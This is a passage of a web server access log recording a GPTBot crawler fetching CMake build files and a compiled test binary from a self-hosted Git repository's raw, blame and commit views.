+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9998] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16187] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" -[17/Feb/2026:14:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" -[17/Feb/2026:14:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11190] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29809] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14637] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11162] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14293] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11269] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20359] [Gzip 16.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11020] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39739] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16047] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20384] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10025] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12009] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16400] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14305] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 